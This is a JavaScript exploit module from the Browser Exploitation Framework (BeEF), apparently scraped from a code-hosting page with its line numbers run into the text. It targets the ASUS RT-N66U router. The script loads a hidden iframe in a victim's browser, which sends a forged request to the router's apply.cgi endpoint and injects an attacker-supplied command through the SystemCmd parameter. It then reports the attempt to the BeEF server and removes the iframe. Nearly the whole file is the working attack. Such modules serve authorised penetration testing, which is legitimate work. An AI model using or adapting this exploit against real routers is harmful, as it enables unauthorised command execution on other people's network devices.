Path: blob/master/modules/exploits/router/asus_rt_n66u_cmd_exec/command.js
1154 views
//1// Copyright (c) 2006-2025Wade Alcorn - [email protected]2// Browser Exploitation Framework (BeEF) - https://beefproject.com3// See the file 'doc/COPYING' for copying permission4//56beef.execute(function() {78var gateway = '<%= @base %>';9var exec_command = '<%= @exec_command %>';10var timeout = 15;1112var asus_rt_n66u_iframe1_<%= @command_id %> = beef.dom.createInvisibleIframe();1314asus_rt_n66u_iframe1_<%= @command_id %>.setAttribute('src',"http://" + gateway +"/apply.cgi?current_page=Main_Netstat_Content.asp&next_page=Main_Netstat_Content.asp&next_host="+gateway+"&group_id=&modified=0&action_mode=+Refresh+&action_script=&action_wait=&first_time=&preferred_lang=EN&SystemCmd="+exec_command+"&firmver=3.0.0.4&cmdMethod=netstat&NetOption=-a&targetip=&ExtOption=-r+state");1516beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");171819cleanup = function() {20document.body.removeChild(asus_rt_n66u_iframe1_<%= @command_id %>);2122}23setTimeout("cleanup()", timeout*1000);2425});26272829